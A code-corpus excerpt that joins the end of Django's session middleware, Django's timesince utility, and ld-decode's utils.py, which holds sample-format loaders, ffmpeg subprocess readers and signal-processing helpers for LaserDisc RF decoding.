session_key = request.COOKIES.get(settings.SESSION_COOKIE_NAME)
request.session = self.SessionStore(session_key)
def process_response(self, request, response):
"""
If request.session was modified, or if the configuration is to save the
session every time, save the changes and set a session cookie or delete
the session cookie if the session has been emptied.
"""
try:
accessed = request.session.accessed
modified = request.session.modified
empty = request.session.is_empty()
except AttributeError:
pass
else:
# First check if we need to delete this cookie.
# The session should be deleted only if the session is entirely empty
if settings.SESSION_COOKIE_NAME in request.COOKIES and empty:
response.delete_cookie(
settings.SESSION_COOKIE_NAME,
path=settings.SESSION_COOKIE_PATH,
domain=settings.SESSION_COOKIE_DOMAIN,
)
else:
if accessed:
patch_vary_headers(response, ('Cookie',))
if (modified or settings.SESSION_SAVE_EVERY_REQUEST) and not empty:
if request.session.get_expire_at_browser_close():
max_age = None
expires = None
else:
max_age = request.session.get_expiry_age()
expires_time = time.time() + max_age
expires = cookie_date(expires_time)
# Save the session data and refresh the client cookie.
# Skip session save for 500 responses, refs #3881.
if response.status_code != 500:
try:
request.session.save()
except UpdateError:
raise SuspiciousOperation(
"The request's session was deleted before the "
"request completed. The user may have logged "
"out in a concurrent request, for example."
)
response.set_cookie(
settings.SESSION_COOKIE_NAME,
request.session.session_key, max_age=max_age,
expires=expires, domain=settings.SESSION_COOKIE_DOMAIN,
path=settings.SESSION_COOKIE_PATH,
secure=settings.SESSION_COOKIE_SECURE or None,
httponly=settings.SESSION_COOKIE_HTTPONLY or None,
)
return response
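# A minimal settings sketch for enabling this middleware; the values shown
# are the stock Django defaults, listed here for illustration:
#
#   MIDDLEWARE = [
#       'django.contrib.sessions.middleware.SessionMiddleware',
#       # ...
#   ]
#   SESSION_ENGINE = 'django.contrib.sessions.backends.db'
#   SESSION_SAVE_EVERY_REQUEST = False  # only persist modified sessions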
| apache-2.0 |
pk400/catering | myvenv/lib/python3.4/site-packages/django/utils/timesince.py | 409 | 2671 | from __future__ import unicode_literals
import calendar
import datetime
from django.utils.html import avoid_wrapping
from django.utils.timezone import is_aware, utc
from django.utils.translation import ugettext, ungettext_lazy
TIMESINCE_CHUNKS = (
(60 * 60 * 24 * 365, ungettext_lazy('%d year', '%d years')),
(60 * 60 * 24 * 30, ungettext_lazy('%d month', '%d months')),
(60 * 60 * 24 * 7, ungettext_lazy('%d week', '%d weeks')),
(60 * 60 * 24, ungettext_lazy('%d day', '%d days')),
(60 * 60, ungettext_lazy('%d hour', '%d hours')),
(60, ungettext_lazy('%d minute', '%d minutes'))
)
def timesince(d, now=None, reversed=False):
"""
Takes two datetime objects and returns the time between d and now
as a nicely formatted string, e.g. "10 minutes". If d occurs after now,
then "0 minutes" is returned.
Units used are years, months, weeks, days, hours, and minutes.
Seconds and microseconds are ignored. Up to two adjacent units will be
displayed. For example, "2 weeks, 3 days" and "1 year, 3 months" are
possible outputs, but "2 weeks, 3 hours" and "1 year, 5 days" are not.
Adapted from
http://web.archive.org/web/20060617175230/http://blog.natbat.co.uk/archive/2003/Jun/14/time_since
"""
# Convert datetime.date to datetime.datetime for comparison.
if not isinstance(d, datetime.datetime):
d = datetime.datetime(d.year, d.month, d.day)
if now and not isinstance(now, datetime.datetime):
now = datetime.datetime(now.year, now.month, now.day)
if not now:
now = datetime.datetime.now(utc if is_aware(d) else None)
delta = (d - now) if reversed else (now - d)
# Deal with leap years by subtracting the number of leap days
delta -= datetime.timedelta(calendar.leapdays(d.year, now.year))
# ignore microseconds
since = delta.days * 24 * 60 * 60 + delta.seconds
if since <= 0:
# d is in the future compared to now, stop processing.
return avoid_wrapping(ugettext('0 minutes'))
for i, (seconds, name) in enumerate(TIMESINCE_CHUNKS):
count = since // seconds
if count != 0:
break
result = avoid_wrapping(name % count)
if i + 1 < len(TIMESINCE_CHUNKS):
# Now get the second item
seconds2, name2 = TIMESINCE_CHUNKS[i + 1]
count2 = (since - (seconds * count)) // seconds2
if count2 != 0:
result += ugettext(', ') + avoid_wrapping(name2 % count2)
return result
def timeuntil(d, now=None):
"""
Like timesince, but returns a string measuring the time until
the given time.
"""
return timesince(d, now, reversed=True)
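# A quick sketch of the rounding behavior (dates are arbitrary). Note the
# non-breaking spaces inserted by avoid_wrapping:
#   >>> import datetime
#   >>> timesince(datetime.datetime(2015, 1, 1),
#   ...           datetime.datetime(2015, 1, 16, 3, 0))
#   '2\xa0weeks, 1\xa0day'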
| mit |
happycube/ld-decode | lddecode/utils.py | 1 | 29033 | # A collection of helper functions used in dev notebooks and lddecode_core.py
import atexit
from base64 import b64encode
from collections import namedtuple
import copy
import getopt
import io
from io import BytesIO
import json
import math
import os
import sys
import subprocess
from multiprocessing import Process, Pool, Queue, JoinableQueue, Pipe
import threading
import queue
from numba import jit, njit
# standard numeric/scientific libraries
import numpy as np
import scipy as sp
import scipy.signal as sps
from scipy import interpolate
# This runs a cubic scaler on a line.
# originally from https://www.paulinternet.nl/?page=bicubic
@njit(nogil=True)
def scale(buf, begin, end, tgtlen, mult=1):
linelen = end - begin
sfactor = linelen / tgtlen
output = np.zeros(tgtlen, dtype=buf.dtype)
for i in range(0, tgtlen):
coord = (i * sfactor) + begin
start = int(coord) - 1
p = buf[start : start + 4]
x = coord - int(coord)
output[i] = mult * (
p[1]
+ 0.5
* x
* (
p[2]
- p[0]
+ x
* (
2.0 * p[0]
- 5.0 * p[1]
+ 4.0 * p[2]
- p[3]
+ x * (3.0 * (p[1] - p[2]) + p[3] - p[0])
)
)
)
return output
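# A hedged usage sketch (the helper below is ours, for illustration only):
# resample a synthetic 910-sample line down to 760 samples. begin/end may
# be fractional, which is how subsample-accurate line boundaries from the
# TBC stage are honored.
def _scale_example():
    line = np.sin(np.linspace(0, 8 * np.pi, 910))
    return scale(line, 1.5, 908.5, 760)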
frequency_suffixes = [
("ghz", 1.0e9),
("mhz", 1.0e6),
("khz", 1.0e3),
("hz", 1.0),
("fsc", 315.0e6 / 88.0),
("fscpal", (283.75 * 15625) + 25),
]
def parse_frequency(string):
"""Parse an argument string, returning a float frequency in MHz."""
multiplier = 1.0e6
for suffix, mult in frequency_suffixes:
if string.lower().endswith(suffix):
multiplier = mult
string = string[: -len(suffix)]
break
return (multiplier * float(string)) / 1.0e6
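# For example (illustrative): parse_frequency("40000khz") == 40.0, and
# parse_frequency("8fsc") == 8 * (315 / 88) ~= 28.636 (all values in MHz).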
"""
For this part of the loader phase I found myself going to function objects that implement this sample API:
```
infile: standard readable/seekable python binary file
sample: starting sample #
readlen: # of samples
```
Returns data if successful, or None or an upstream exception if not (including if not enough data is available)
"""
def make_loader(filename, inputfreq=None):
"""Return an appropriate loader function object for filename.
If inputfreq is specified, it gives the sample rate in MHz of the source
file, and the loader will resample from that rate to 40 MHz. Any sample
rate specified by the source file's metadata will be ignored, as some
formats can't represent typical RF sample rates accurately."""
if inputfreq is not None:
# We're resampling, so we have to use ffmpeg.
if filename.endswith(".r16") or filename.endswith(".s16"):
input_args = ["-f", "s16le"]
elif filename.endswith(".rf"):
input_args = ["-f", "f32le"]
elif filename.endswith(".r8") or filename.endswith(".u8"):
input_args = ["-f", "u8"]
elif filename.endswith(".u16"):
input_args = ["-f", "u16le"]
elif filename.endswith(".lds") or filename.endswith(".r30"):
raise ValueError("File format not supported when resampling: " + filename)
else:
# Assume ffmpeg will recognise this format itself.
input_args = []
# Use asetrate first to override the input file's sample rate.
output_args = [
"-filter:a",
"asetrate=" + str(inputfreq * 1e6) + ",aresample=" + str(40e6),
]
return LoadFFmpeg(input_args=input_args, output_args=output_args)
elif filename.endswith(".lds"):
return load_packed_data_4_40
elif filename.endswith(".r30"):
return load_packed_data_3_32
elif filename.endswith(".rf"):
return load_unpacked_data_float32
elif filename.endswith(".r16") or filename.endswith(".s16"):
return load_unpacked_data_s16
elif filename.endswith(".u16"):
return load_unpacked_data_u16
elif filename.endswith(".r8") or filename.endswith(".u8"):
return load_unpacked_data_u8
elif filename.endswith("raw.oga") or filename.endswith(".ldf"):
try:
rv = LoadLDF(filename)
except:
# print("Please build and install ld-ldf-reader in your PATH for improved performance", file=sys.stderr)
rv = LoadFFmpeg()
return rv
else:
return load_packed_data_4_40
def load_unpacked_data(infile, sample, readlen, sampletype):
# this is run for unpacked data:
# 1 is for 8-bit cxadc data, 2 for 16bit DD, 3 for 16bit cxadc
samplelength = 2 if sampletype == 3 else sampletype
infile.seek(sample * samplelength, 0)
inbuf = infile.read(readlen * samplelength)
if sampletype == 4:
indata = np.frombuffer(inbuf, "float32", len(inbuf) // 4) * 32768
elif sampletype == 3:
indata = np.frombuffer(inbuf, "uint16", len(inbuf) // 2)
elif sampletype == 2:
indata = np.frombuffer(inbuf, "int16", len(inbuf) // 2)
else:
indata = np.frombuffer(inbuf, "uint8", len(inbuf))
if len(indata) < readlen:
return None
return indata
def load_unpacked_data_u8(infile, sample, readlen):
return load_unpacked_data(infile, sample, readlen, 1)
def load_unpacked_data_s16(infile, sample, readlen):
return load_unpacked_data(infile, sample, readlen, 2)
def load_unpacked_data_u16(infile, sample, readlen):
return load_unpacked_data(infile, sample, readlen, 3)
def load_unpacked_data_float32(infile, sample, readlen):
return load_unpacked_data(infile, sample, readlen, 4)
# This is for the .r30 format I did in ddpack/unpack.c. Depricated but I still have samples in it.
def load_packed_data_3_32(infile, sample, readlen):
start = (sample // 3) * 4
offset = sample % 3
infile.seek(start)
# we need another word in case offset != 0
needed = int(np.ceil(readlen * 3 / 4) * 4) + 4
inbuf = infile.read(needed)
indata = np.frombuffer(inbuf, "uint32", len(inbuf) // 4)
if len(inbuf) < needed:
return None
unpacked = np.zeros(len(indata) * 3, dtype=np.int16)
# By using strides the unpacked data can be loaded with no additional copies
np.bitwise_and(indata, 0x3FF, out=unpacked[0::3])
# hold the shifted bits in it's own array to avoid an allocation
tmp = np.right_shift(indata, 10)
np.bitwise_and(tmp, 0x3FF, out=unpacked[1::3])
np.right_shift(indata, 20, out=tmp)
np.bitwise_and(tmp, 0x3FF, out=unpacked[2::3])
return unpacked[offset : offset + readlen]
# The 10-bit samples from the Duplicator...
"""
From Simon's code:
// Original
// 0: xxxx xx00 0000 0000
// 1: xxxx xx11 1111 1111
// 2: xxxx xx22 2222 2222
// 3: xxxx xx33 3333 3333
//
// Packed:
// 0: 0000 0000 0011 1111
// 2: 1111 2222 2222 2233
// 4: 3333 3333
"""
# The bit twiddling is a bit more complex than I'd like... but eh. I think
# it's debugged now. ;)
def load_packed_data_4_40(infile, sample, readlen):
start = (sample // 4) * 5
offset = sample % 4
seekedto = infile.seek(start)
# we need another word in case offset != 0
needed = int(np.ceil(readlen * 5 // 4)) + 5
inbuf = infile.read(needed)
indata = np.frombuffer(inbuf, "uint8", len(inbuf))
if len(indata) < needed:
return None
rot2 = np.right_shift(indata, 2)
unpacked = np.zeros(readlen + 4, dtype=np.uint16)
# we need to load the 8-bit data into the 16-bit unpacked for left_shift to work
# correctly...
unpacked[0::4] = indata[0::5]
np.left_shift(unpacked[0::4], 2, out=unpacked[0::4])
np.bitwise_or(
unpacked[0::4],
np.bitwise_and(np.right_shift(indata[1::5], 6), 0x03),
out=unpacked[0::4],
)
unpacked[1::4] = np.bitwise_and(indata[1::5], 0x3F)
np.left_shift(unpacked[1::4], 4, out=unpacked[1::4])
np.bitwise_or(
unpacked[1::4],
np.bitwise_and(np.right_shift(indata[2::5], 4), 0x0F),
out=unpacked[1::4],
)
unpacked[2::4] = np.bitwise_and(indata[2::5], 0x0F)
np.left_shift(unpacked[2::4], 6, out=unpacked[2::4])
np.bitwise_or(
unpacked[2::4],
np.bitwise_and(np.right_shift(indata[3::5], 2), 0x3F),
out=unpacked[2::4],
)
unpacked[3::4] = np.bitwise_and(indata[3::5], 0x03)
np.left_shift(unpacked[3::4], 8, out=unpacked[3::4])
np.bitwise_or(unpacked[3::4], indata[4::5], out=unpacked[3::4])
# convert back to original DdD 16-bit format (signed 16-bit, left shifted)
rv_unsigned = unpacked[offset : offset + readlen].copy()
rv_signed = np.left_shift(rv_unsigned.astype(np.int16) - 512, 6)
return rv_signed
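# A hedged round-trip sketch of the layout documented above (the helper
# and sample values are ours, for illustration): pack four 10-bit samples
# into five bytes, then confirm load_packed_data_4_40 recovers them in the
# DdD-style signed 16-bit form.
def _pack_4_40_example():
    samples = [0x201, 0x0AA, 0x3FF, 0x000]
    packed = bytes([
        samples[0] >> 2,
        ((samples[0] & 0x03) << 6) | (samples[1] >> 4),
        ((samples[1] & 0x0F) << 4) | (samples[2] >> 6),
        ((samples[2] & 0x3F) << 2) | (samples[3] >> 8),
        samples[3] & 0xFF,
    ])
    unpacked = load_packed_data_4_40(BytesIO(packed * 3), 0, 4)
    assert list(unpacked) == [(s - 512) << 6 for s in samples]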
class LoadFFmpeg:
"""Load samples from a wide variety of formats using ffmpeg."""
def __init__(self, input_args=[], output_args=[]):
self.input_args = input_args
self.output_args = output_args
# ffmpeg subprocess
self.ffmpeg = None
# The number of the next byte ffmpeg will return
self.position = 0
# Keep a buffer of recently-read data, to allow seeking backwards by
# small amounts. The last byte returned by ffmpeg is at the end of
# this buffer.
self.rewind_size = 2 * 1024 * 1024
self.rewind_buf = b""
def __del__(self):
if self.ffmpeg is not None:
self.ffmpeg.kill()
self.ffmpeg.wait()
def _read_data(self, count):
"""Read data as bytes from ffmpeg, append it to the rewind buffer, and
return it. May return less than count bytes if EOF is reached."""
data = self.ffmpeg.stdout.read(count)
self.position += len(data)
self.rewind_buf += data
self.rewind_buf = self.rewind_buf[-self.rewind_size :]
return data
def read(self, infile, sample, readlen):
sample_bytes = sample * 2
readlen_bytes = readlen * 2
if self.ffmpeg is None:
command = ["ffmpeg", "-hide_banner", "-loglevel", "error"]
command += self.input_args
command += ["-i", "-"]
command += self.output_args
command += ["-c:a", "pcm_s16le", "-f", "s16le", "-"]
self.ffmpeg = subprocess.Popen(
command, stdin=infile, stdout=subprocess.PIPE
)
if sample_bytes < self.position:
# Seeking backwards - use data from rewind_buf
start = len(self.rewind_buf) - (self.position - sample_bytes)
end = min(start + readlen_bytes, len(self.rewind_buf))
if start < 0:
raise IOError("Seeking too far backwards with ffmpeg")
buf_data = self.rewind_buf[start:end]
sample_bytes += len(buf_data)
readlen_bytes -= len(buf_data)
else:
buf_data = b""
while sample_bytes > self.position:
# Seeking forwards - read and discard samples
count = min(sample_bytes - self.position, self.rewind_size)
self._read_data(count)
if readlen_bytes > 0:
# Read some new data from ffmpeg
read_data = self._read_data(readlen_bytes)
if len(read_data) < readlen_bytes:
# Short read - end of file
return None
else:
read_data = b""
data = buf_data + read_data
assert len(data) == readlen * 2
return np.frombuffer(data, "<i2")
def __call__(self, infile, sample, readlen):
return self.read(infile, sample, readlen)
class LoadLDF:
"""Load samples from an .ldf file, using ld-ldf-reader which itself uses ffmpeg."""
def __init__(self, filename, input_args=[], output_args=[]):
self.input_args = input_args
self.output_args = output_args
self.filename = filename
# The number of the next byte ld-ldf-reader will return
self.position = 0
# Keep a buffer of recently-read data, to allow seeking backwards by
# small amounts. The last byte returned by ffmpeg is at the end of
# this buffer.
self.rewind_size = 2 * 1024 * 1024
self.rewind_buf = b""
self.ldfreader = None
# ld-ldf-reader subprocess
self.ldfreader = self._open(0)
def __del__(self):
self._close()
def _read_data(self, count):
"""Read data as bytes from ffmpeg, append it to the rewind buffer, and
return it. May return less than count bytes if EOF is reached."""
data = self.ldfreader.stdout.read(count)
self.position += len(data)
self.rewind_buf += data
self.rewind_buf = self.rewind_buf[-self.rewind_size :]
return data
def _close(self):
try:
if self.ldfreader is not None:
self.ldfreader.kill()
self.ldfreader.wait()
del self.ldfreader
self.ldfreader = None
except:
pass
def _open(self, sample):
self._close()
command = ["ld-ldf-reader", self.filename, str(sample)]
ldfreader = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
self.position = sample * 2
self.rewind_buf = b""
return ldfreader
def read(self, infile, sample, readlen):
sample_bytes = sample * 2
readlen_bytes = readlen * 2
if self.ldfreader is None or ((sample_bytes - self.position) > 40000000):
self.ldfreader = self._open(sample)
if sample_bytes < self.position:
# Seeking backwards - use data from rewind_buf
start = len(self.rewind_buf) - (self.position - sample_bytes)
end = min(start + readlen_bytes, len(self.rewind_buf))
if start < 0:
# raise IOError("Seeking too far backwards with ffmpeg")
self.ldfreader = self._open(sample)
buf_data = b""
else:
buf_data = self.rewind_buf[start:end]
sample_bytes += len(buf_data)
readlen_bytes -= len(buf_data)
elif (sample_bytes - self.position) > (40 * 1024 * 1024 * 2):
self.ldfreader = self._open(sample)
buf_data = b""
else:
buf_data = b""
while sample_bytes > self.position:
# Seeking forwards - read and discard samples
count = min(sample_bytes - self.position, self.rewind_size)
self._read_data(count)
if readlen_bytes > 0:
# Read some new data from ffmpeg
read_data = self._read_data(readlen_bytes)
if len(read_data) < readlen_bytes:
# Short read - end of file
return None
else:
read_data = b""
data = buf_data + read_data
assert len(data) == readlen * 2
return np.frombuffer(data, "<i2")
def __call__(self, infile, sample, readlen):
return self.read(infile, sample, readlen)
def ldf_pipe(outname, compression_level=6):
corecmd = "ffmpeg -y -hide_banner -loglevel error -f s16le -ar 40k -ac 1 -i - -acodec flac -f ogg".split(
" "
)
process = subprocess.Popen(
[*corecmd, "-compression_level", str(compression_level), outname],
stdin=subprocess.PIPE,
)
return process, process.stdin
# Git helpers
def get_git_info():
""" Return git branch and commit for current directory, iff available. """
branch = "UNKNOWN"
commit = "UNKNOWN"
try:
sp = subprocess.run(
"git rev-parse --abbrev-ref HEAD", shell=True, capture_output=True
)
branch = sp.stdout.decode("utf-8").strip() if not sp.returncode else "UNKNOWN"
sp = subprocess.run(
"git rev-parse --short HEAD", shell=True, capture_output=True
)
commit = sp.stdout.decode("utf-8").strip() if not sp.returncode else "UNKNOWN"
except:
pass
return branch, commit
# Essential standalone routines
pi = np.pi
tau = np.pi * 2
# https://stackoverflow.com/questions/20924085/python-conversion-between-coordinates
polar2z = lambda r, θ: r * np.exp(1j * θ)
deg2rad = lambda θ: θ * (np.pi / 180)
def emphasis_iir(t1, t2, fs):
"""Generate an IIR filter for 6dB/octave pre-emphasis (t1 > t2) or
de-emphasis (t1 < t2), given time constants for the two corners."""
# Convert time constants to frequencies, and pre-warp for bilinear transform
w1 = 2 * fs * np.tan((1 / t1) / (2 * fs))
w2 = 2 * fs * np.tan((1 / t2) / (2 * fs))
# Zero at t1, pole at t2
tf_b, tf_a = sps.zpk2tf([-w1], [-w2], w2 / w1)
return sps.bilinear(tf_b, tf_a, fs)
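# A hedged usage sketch (time constants are illustrative, not the decoder's
# real ones): build a de-emphasis filter (t1 < t2) and run it over a block
# of demodulated samples.
def _deemphasis_example(demod, fs=40e6):
    deemp_b, deemp_a = emphasis_iir(0.25e-6, 1.0e-6, fs)
    return sps.lfilter(deemp_b, deemp_a, demod)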
# This converts a regular B, A filter to an FFT of our selected block length
def filtfft(filt, blocklen):
return sps.freqz(filt[0], filt[1], blocklen, whole=1)[1]
@njit
def inrange(a, mi, ma):
return (a >= mi) & (a <= ma)
def sqsum(cmplx):
return np.sqrt((cmplx.real ** 2) + (cmplx.imag ** 2))
@njit(cache=True)
def calczc_findfirst(data, target, rising):
if rising:
for i in range(0, len(data)):
if data[i] >= target:
return i
return None
else:
for i in range(0, len(data)):
if data[i] <= target:
return i
return None
@njit(cache=True)
def calczc_do(data, _start_offset, target, edge=0, count=10):
start_offset = max(1, int(_start_offset))
icount = int(count + 1)
if edge == 0: # capture rising or falling edge
if data[start_offset] < target:
edge = 1
else:
edge = -1
loc = calczc_findfirst(
data[start_offset : start_offset + icount], target, edge == 1
)
if loc is None:
return None
x = start_offset + loc
a = data[x - 1] - target
b = data[x] - target
y = -a / (-a + b)
return x - 1 + y
def calczc(data, _start_offset, target, edge=0, count=10, reverse=False):
""" edge: -1 falling, 0 either, 1 rising """
if reverse:
# Instead of actually implementing this in reverse, use numpy to flip data
rev_zc = calczc_do(data[_start_offset::-1], 0, target, edge, count)
if rev_zc is None:
return None
return _start_offset - rev_zc
return calczc_do(data, _start_offset, target, edge, count)
def calczc_sets(data, start, end, tgt=0, cliplevel=None):
zcsets = {False: [], True: []}
bi = start
while bi < end:
if np.abs(data[bi]) > cliplevel:
zc = calczc(data, bi, tgt)
if zc is not None:
zcsets[data[bi] > tgt].append(zc)
bi = int(zc)
bi += 1
return {False: np.array(zcsets[False]), True: np.array(zcsets[True])}
# Shamelessly based on https://github.com/scipy/scipy/blob/v1.6.0/scipy/signal/signaltools.py#L2264-2267
# ... and intended for real FFT, but seems fine with complex as well ;)
def build_hilbert(fft_size):
if (fft_size // 2) - (fft_size / 2) != 0:
raise Exception("build_hilbert: must have even fft_size")
output = np.zeros(fft_size)
output[0] = output[fft_size // 2] = 1
output[1:fft_size // 2] = 2
return output
def unwrap_hilbert(hilbert, freq_hz):
tangles = np.angle(hilbert)
dangles = np.pad(np.diff(tangles), (1, 0), mode="constant")
# make sure unwrapping goes the right way
if dangles[0] < -pi:
dangles[0] += tau
tdangles2 = np.unwrap(dangles)
# With extremely bad data, the unwrapped angles can jump.
while np.min(tdangles2) < 0:
tdangles2[tdangles2 < 0] += tau
while np.max(tdangles2) > tau:
tdangles2[tdangles2 > tau] -= tau
return tdangles2 * (freq_hz / tau)
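# A hedged sketch of the FFT-domain FM demodulation these two helpers
# support: form the analytic signal with the Hilbert multiplier, then turn
# instantaneous phase into instantaneous frequency. len(rfdata) must be even.
def _fm_demod_example(rfdata, freq_hz):
    analytic = np.fft.ifft(np.fft.fft(rfdata) * build_hilbert(len(rfdata)))
    return unwrap_hilbert(analytic, freq_hz)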
def fft_determine_slices(center, min_bandwidth, freq_hz, bins_in):
''' returns the # of sub-bins needed to get center+/-min_bandwidth.
The returned lowbin is the first bin (symmetrically) needed to be saved.
This will need to be 'flipped' using fft_do_slice to get the trimmed set
'''
# compute the width of each bin
binwidth = freq_hz / bins_in
cbin = nb_round(center / binwidth)
# compute the needed number of fft bins...
bbins = nb_round(min_bandwidth / binwidth)
# ... and round that up to the next power of two
nbins = 2 * (2 ** math.ceil(math.log2(bbins * 2)))
lowbin = cbin - (nbins // 4)
cut_freq = binwidth * nbins
return lowbin, nbins, cut_freq
def fft_do_slice(fdomain, lowbin, nbins, blocklen):
''' Uses lowbin and nbins as returned from fft_determine_slices to
cut the fft '''
nbins_half = nbins//2
return np.concatenate([fdomain[lowbin:lowbin+nbins_half], fdomain[blocklen-lowbin-nbins_half:blocklen-lowbin]])
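# A hedged usage sketch: carve the band around a 2.3 MHz carrier out of a
# 65536-bin FFT taken at 40 MHz (numbers are illustrative). The sliced FFT
# can then be processed and inverse-transformed at the reduced rate cut_freq.
#   lowbin, nbins, cut_freq = fft_determine_slices(2.3e6, 600e3, 40e6, 65536)
#   sliced = fft_do_slice(np.fft.fft(block), lowbin, nbins, 65536)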
def genwave(rate, freq, initialphase=0):
""" Generate an FM waveform from target frequency data """
out = np.zeros(len(rate), dtype=np.double)
angle = initialphase
for i in range(0, len(rate)):
out[i] = np.sin(angle)
angle += np.pi * (rate[i] / freq)
if angle > np.pi:
angle -= tau
return out
# slightly faster than np.std for short arrays
@njit
def rms(arr):
return np.sqrt(np.mean(np.square(arr - np.mean(arr))))
# MTF calculations
def get_fmax(cavframe=0, laser=780, na=0.5, fps=30):
loc = 0.055 + ((cavframe / 54000) * 0.090)
return (2 * na / (laser / 1000)) * (2 * np.pi * fps) * loc
def compute_mtf(freq, cavframe=0, laser=780, na=0.52):
fmax = get_fmax(cavframe, laser, na)
freq_mhz = freq / 1000000
if type(freq_mhz) == np.ndarray:
freq_mhz[freq_mhz > fmax] = fmax
elif freq_mhz > fmax:
return 0
# from Compact Disc Technology by Heitarō Nakajima and Hiroshi Ogawa, page 17
return (2 / np.pi) * (
np.arccos(freq_mhz / fmax)
- ((freq_mhz / fmax) * np.sqrt(1 - ((freq_mhz / fmax) ** 2)))
)
def roundfloat(fl, places=3):
""" round float to (places) decimal places """
r = 10 ** places
return np.round(fl * r) / r
# Something like this should be a numpy function, but I can't find it.
@jit(cache=True)
def findareas(array, cross):
""" Find areas where `array` is <= `cross`
returns: array of tuples of said areas (begin, end, length)
"""
starts = np.where(np.logical_and(array[1:] < cross, array[:-1] >= cross))[0]
ends = np.where(np.logical_and(array[1:] >= cross, array[:-1] < cross))[0]
# remove 'dangling' beginnings and endings so everything zips up nicely and in order
if ends[0] < starts[0]:
ends = ends[1:]
if starts[-1] > ends[-1]:
starts = starts[:-1]
return [(*z, z[1] - z[0]) for z in zip(starts, ends)]
def findpulses(array, low, high):
""" Find areas where `array` is between `low` and `high`
returns: array of tuples of said areas (begin, end, length)
"""
Pulse = namedtuple("Pulse", "start len")
array_inrange = inrange(array, low, high)
starts = np.where(
np.logical_and(array_inrange[1:] == True, array_inrange[:-1] == False)
)[0]
ends = np.where(
np.logical_and(array_inrange[1:] == False, array_inrange[:-1] == True)
)[0]
if len(starts) == 0 or len(ends) == 0:
return []
# remove 'dangling' beginnings and endings so everything zips up nicely and in order
if ends[0] < starts[0]:
ends = ends[1:]
if starts[-1] > ends[-1]:
starts = starts[:-1]
return [Pulse(z[0], z[1] - z[0]) for z in zip(starts, ends)]
def findpeaks(array, low=0):
array2 = array.copy()
array2[np.where(array2 < low)] = 0
# a local maximum must sit strictly above both of its neighbors
return [
loc + 1
for loc in np.where(
np.logical_and(array2[1:-1] > array2[:-2], array2[1:-1] > array2[2:])
)[0]
]
# originally from http://www.paulinternet.nl/?page=bicubic
def cubic_interpolate(data, loc):
p = data[int(loc) - 1 : int(loc) + 3]
x = loc - np.floor(loc)
return p[1] + 0.5 * x * (
p[2]
- p[0]
+ x
* (
2.0 * p[0]
- 5.0 * p[1]
+ 4.0 * p[2]
- p[3]
+ x * (3.0 * (p[1] - p[2]) + p[3] - p[0])
)
)
def LRUupdate(l, k):
""" This turns a list into an LRU table. When called it makes sure item 'k' is at the beginning,
so the list is in descending order of previous use.
"""
try:
l.remove(k)
except:
pass
l.insert(0, k)
@njit
def nb_median(m):
return np.median(m)
@njit
def nb_round(m):
return int(np.round(m))
@njit
def nb_mean(m):
return np.mean(m)
@njit
def nb_min(m):
return np.min(m)
@njit
def nb_max(m):
return np.max(m)
@njit
def nb_abs(m):
return np.abs(m)
@njit
def nb_absmax(m):
return np.max(np.abs(m))
@njit
def nb_mul(x, y):
return x * y
@njit
def nb_where(x):
return np.where(x)
def angular_mean(x, cycle_len=1.0, zero_base=True):
""" Compute the mean phase, assuming 0..1 is one phase cycle
(Using this technique handles the 3.99, 5.01 issue,
where otherwise the phase average would be 0.5.  While a
naive computation could be changed to rotate around 0.5,
that breaks down when things are out of phase...)
"""
x2 = x - np.floor(x) # not strictly necessary but slightly more precise
# refer to https://en.wikipedia.org/wiki/Mean_of_circular_quantities
angles = [np.e ** (1j * f * np.pi * 2 / cycle_len) for f in x2]
am = np.angle(np.mean(angles)) / (np.pi * 2)
if zero_base and (am < 0):
am = 1 + am
return am
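# For example, the naive mean of the phases [0.99, 0.01] is 0.5, but
# angular_mean([0.99, 0.01]) treats them as neighboring angles and
# returns 0.0.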
def phase_distance(x, c=0.75):
""" returns the shortest path between two phases (assuming x and c are in (0..1)) """
d = (x - np.floor(x)) - c
if d < -0.5:
d += 1
elif d > 0.5:
d -= 1
return d
# Used to help w/CX routines
@njit
def db_to_lev(db):
return 10 ** (db / 20)
@njit
def lev_to_db(rlev):
return 20 * np.log10(rlev)
# moved from core.py
@njit
def dsa_rescale(infloat):
return int(np.round(infloat * 32767 / 150000))
# Hotspot subroutines in FieldNTSC's compute_line_bursts function,
# removed so that they can be JIT'd
@njit(cache=True)
def clb_findnextburst(burstarea, i, endburstarea, threshold):
for j in range(i, endburstarea):
if np.abs(burstarea[j]) > threshold:
return burstarea[j], calczc_do(burstarea, j, 0)
return (None, None)
@njit(cache=True)
def distance_from_round(x):
# Yes, this was a hotspot.
return np.round(x) - x
# Write the .tbc.json file (used by lddecode and notebooks)
def write_json(ldd, jsondict, outname):
fp = open(outname + ".tbc.json.tmp", "w")
json.dump(jsondict, fp, indent=4 if ldd.verboseVITS else None)
fp.write("\n")
fp.close()
os.rename(outname + ".tbc.json.tmp", outname + ".tbc.json")
def jsondump_thread(ldd, outname):
"""
This creates a background thread to write a json dict to a file.
Probably had a bit too much fun here - this returns a queue that is
fed into a thread created by the function itself. Feed it json
dictionaries during runtime and None when done.
"""
def consume(q):
while True:
jsondict = q.get()
if jsondict is None:
q.task_done()
return
write_json(ldd, jsondict, outname)
q.task_done()
q = JoinableQueue()
# Start the self-contained thread
t = threading.Thread(target=consume, args=(q,))
t.start()
return q
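# A hedged usage sketch (`ldd` stands in for the decoder object):
#   jsonq = jsondump_thread(ldd, outname)
#   jsonq.put(ldd.build_json(ldd.curfield))  # whenever an update is wanted
#   jsonq.put(None)   # tell the writer thread to exit
#   jsonq.join()      # block until the final write completes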
class StridedCollector:
# This accumulates numpy data and emits fixed-size fft blocks, keeping
# `stride` samples of overlap for the next fft block.
def __init__(self, blocklen = 65536, stride = 2048):
self.buffer = None
self.blocklen = blocklen
self.stride = stride
def add(self, data):
if self.buffer is None:
self.buffer = data
else:
self.buffer = np.concatenate([self.buffer, data])
return self.have_block()
def have_block(self):
return (self.buffer is not None) and (len(self.buffer) >= self.blocklen)
def get_block(self):
if self.have_block():
rv = self.buffer[0:self.blocklen]
self.buffer = self.buffer[self.blocklen-self.stride:]
return rv
return None
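# A hedged usage sketch: feed arbitrary-sized reads in, pull out fixed
# 65536-sample blocks that share `stride` samples of overlap with their
# successor - the shape the FFT filter stages expect.
def _strided_collector_example():
    collector = StridedCollector(blocklen=65536, stride=2048)
    blocks = []
    while len(blocks) < 4:
        if collector.add(np.zeros(30000, dtype=np.int16)):
            while collector.have_block():
                blocks.append(collector.get_block())
    return blocks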
if __name__ == "__main__":
print("Nothing to see here, move along ;)")
| gpl-3.0 |
